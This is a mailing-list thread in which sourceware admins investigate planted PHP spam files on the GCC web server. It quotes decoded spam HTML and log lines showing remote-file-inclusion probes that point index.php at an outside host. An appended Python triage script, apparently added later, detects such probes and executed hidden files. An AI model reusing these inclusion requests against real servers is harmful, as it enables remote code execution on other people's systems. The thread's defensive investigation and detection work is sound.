public inbox for overseers@sourceware.org
* htdig/.cache directory
From: Joseph S. Myers @ 2010-03-03  1:23 UTC (permalink / raw)
  To: overseers

The latest gccadmin update_web_docs_svn cron job resulted in a large 
number of errors of the form:

rm: cannot remove `./htdig/.cache/.%2E8F%0A8A%ECC8%9BC5%EF7A%2C8B': Permission denied

http://gcc.gnu.org/ml/gccadmin/2010-q1/msg00150.html

Has something changed just now to create this directory 
(/www/gcc/htdocs/htdig/.cache), or to make it non-writable to gccadmin?  
If this directory is indeed meant to be there, then the relevant script 
(wwwdocs/bin/preprocess) probably needs to be taught to ignore it rather 
than trying to remove files from it.

-- 
Joseph S. Myers
joseph@codesourcery.com


* Re: htdig/.cache directory
From: Joseph S. Myers @ 2010-03-03  2:47 UTC (permalink / raw)
  To: overseers

In IRC discussion, we (fche and I) concluded that the files should not be 
there, and the problem was that something (unidentified) had created them; 
there are more such .cache directories elsewhere on the system, that also 
should not be there, some created on Feb 26.  We haven't worked out what 
created the files.

-- 
Joseph S. Myers
joseph@codesourcery.com


* Re: htdig/.cache directory
From: Frank Ch. Eigler @ 2010-03-03  2:53 UTC (permalink / raw)
  To: Joseph S. Myers; +Cc: overseers

Hi -

> [...] We haven't worked out what created the files.

Eww, base-64-decoded some random one of the /.cache/.%DEADBEEF files:

<!--/shop/item/325/-->
<html>
<head>
<title>download windows 7 via ftp CLICK HERE! DOWNLOAD Microsoft Windows 7 Ultimate (64 bit)! NEW SOFTWARE!</title>
<meta name="description" content="Download Windows 7 Via Ftp. The same situation exists with MP3 arguably the most popular format for audio (notably audio you rip from your CD collection). ">
<meta name="keywords" content="download windows 7 via ftp,download windows 7 via ftp,download windows 7 via ftp">
<meta name="author" content="Jason Molenda, International Man Of Mystery">
</head>
<body bgcolor="white" text="black" link="#0000EE" VLINK="#551A8B" ALINK="red">
<table align="left" border="1" cellspacing="0" cellpadding="8" width="20%">
 <td bgcolor="#eeeeee" valign="top">
  <table bgcolor="#eeeeee" border="0" cellspacing="0" cellpadding="3" width="100%">
   <tr><td colspan="2"><p></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/6074/download/cheap-cs4.html" title="cheap cs4">Cheap Cs4</a></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/1213/download/buy-after-effects.html" title="buy after effects">Buy After Effects</a></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/4092/download/buy-frontpage.html" title="buy frontpage">Buy Frontpage</a></td></tr>
   <tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/3282/download/xp-for-sale.html" title="xp for sale">Xp For Sale</a></td></tr>

....


* probable php exploit, was Re: htdig/.cache directory
From: Frank Ch. Eigler @ 2010-03-03  3:24 UTC (permalink / raw)
  To: Joseph S. Myers; +Cc: overseers

Hi -

It gets better.  So someone placed /index.php files here and there,
using the .cache files as spam payload.  I saved a bunch of this in
/root/dot-cache-spam-artifacts/.


There are suspicious entries such as this in the logs:
% fgrep .cache /var/log/httpd/gcc*_log | less
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice:  Undefined index:  HTTP_A in /export/u0/sourceware/sourceware/www/gcc/

Searching for that IP address:
/var/log/httpd/cygwin-combined_log:66.249.71.244 - - [01/Mar/2010:12:28:18 +0000] "GET /cgi%20%5B...%5D%3C/b%3E%3C/td%3E%3C/span%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cspan%20class='wynikfirmy1'%20style='font:%20normal%2010px%20verdana;'%3E%20%20%20%20%20%20%20%202008-10-10%20::%20%3Ca%20class='wynikfirmy1'%20href='?oid=451&odp=1387'%3Emammamia;%20%3Ca%20href= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" (67%)

But according to ARIN it's a real google address.


More suspicious stuff:
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET //index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 297 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11/msg00424.html//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 319 "-" "Mozilla/5.0" (-%)


I up2dated php and other stuff on sourceware; maybe it was a
vulnerability there being exploited.  Previous version was 4.3.9-3.26.
See also http://rhn.redhat.com/errata/RHSA-2010-0040.html
See also http://www.google.com/search?q=php%20Undefined%20index%20HTTP_A
for another few victims.

- FChE
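As an added example (not code from this thread or from sourceware), the two log searches described in the message above turned into a small Python triage script: it flags access-log requests whose query parameter is itself a URL (the `index.php?include=http://...` remote-file-inclusion probes, including percent-encoded variants) and error-log PHP diagnostics attributed to hidden files under a `.cache` directory (the `Undefined index: HTTP_A ... on line 1` notices, which show those files being executed). The log lines, IPs and hostnames are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines modelled on the patterns quoted in the thread
# (not copied from the real sourceware logs; hosts use reserved names).
ACCESS_LOG = """\
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml//index.php?include=http://example.invalid/columbus/heheh.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Feb/2010:07:21:03 +0000] "GET /ml/gcc/2009-10/msg00001.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Feb/2010:07:22:10 +0000] "GET /cgi-bin/search.cgi?q=%68%74%74%70%3a%2f%2fexample.invalid/x.txt HTTP/1.1" 404 333 "-" "curl/7.19"
"""
ERROR_LOG = """\
[client 192.0.2.10] PHP Notice:  Undefined index:  HTTP_A in /www/gcc/htdocs/htdig/.cache/.%D59C%49AA on line 1
[client 192.0.2.11] PHP Notice:  Undefined variable:  foo in /www/gcc/htdocs/search.php on line 42
"""

# Apache combined-format prefix: client IP, timestamp, request line, status.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A parameter whose value is itself a URL is the signature of a remote-file-inclusion probe.
URL_VALUE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# PHP diagnostics naming a dotfile inside a .cache directory: the engine is executing
# a file that has no business being in the webroot.
CACHE_DOTFILE_RE = re.compile(
    r'PHP (?:Notice|Warning|Fatal error):.* in (?P<path>\S*/\.cache/\.\S+) on line (?P<line>\d+)')

def rfi_probes(access_text):
    """Return (ip, param, value) for every request carrying a URL-valued query parameter."""
    hits = []
    for line in access_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            if URL_VALUE_RE.match(value):
                hits.append((m["ip"], name, value))
    return hits

def executed_cache_files(error_text):
    """Return the distinct .cache dotfile paths PHP reports executing."""
    return sorted({m["path"] for m in map(CACHE_DOTFILE_RE.search, error_text.splitlines()) if m})

def triage(access_text, error_text):
    """Summarise both signals: source IPs to block/review and planted files to remove."""
    return {"rfi_probe_ips": sorted({ip for ip, _, _ in rfi_probes(access_text)}),
            "executed_cache_files": executed_cache_files(error_text)}

if __name__ == "__main__":
    print(triage(ACCESS_LOG, ERROR_LOG))
```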

